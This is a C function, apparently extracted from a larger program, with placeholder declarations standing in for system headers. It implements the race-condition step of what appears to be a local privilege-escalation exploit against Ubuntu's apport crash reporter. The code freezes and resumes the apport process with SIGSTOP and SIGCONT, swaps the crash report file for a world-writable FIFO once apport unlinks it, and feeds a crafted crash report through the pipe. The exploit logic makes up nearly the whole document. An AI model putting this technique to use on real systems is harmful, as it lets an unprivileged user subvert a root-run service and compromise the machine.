
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {int st_mode; } ;


 int O_WRONLY ;
 int SIGCONT ;
 int SIGSTOP ;
 int S_IFIFO ;
 int apport_pid ;
 int close (int) ;
 int crash_report ;
 int fprintf (int ,char*,...) ;
 int kill (int ,int ) ;
 int mknod (int ,int,int ) ;
 int open (int ,int ) ;
 int report ;
 int sleep (int) ;
 int stat (int ,struct stat*) ;
 int stderr ;
 int strlen (int ) ;
 int unlink (int ) ;
 int write (int,int ,int ) ;

void checker(void)
{
    struct stat s;
    int fd, mode, x;

    stat(report, &s);

    fprintf(stderr,"\nchecker: mode %d\nwaiting for file to be unlinked..", s.st_mode);

    mode = s.st_mode;

    while(1) {

        kill(apport_pid, SIGCONT);
        kill(apport_pid, SIGSTOP);



        for(x = 0; x < 100000; x++);

        stat(report, &s);

        if(s.st_mode != mode)
            break;
    }

    fprintf(stderr,"\nchecker: new mode %d .. done\n", s.st_mode);

    unlink(report);
    mknod(report, S_IFIFO | 0666, 0);

    fprintf(stderr,"checker: SIGCONT\n");
    kill(apport_pid, SIGCONT);

    fprintf(stderr,"checker: writing core\n");

    fd = open(report, O_WRONLY);
    write(fd, crash_report, strlen(crash_report));
    close(fd);
    fprintf(stderr,"checker: done\n");

    while(1)
        sleep(1);
}
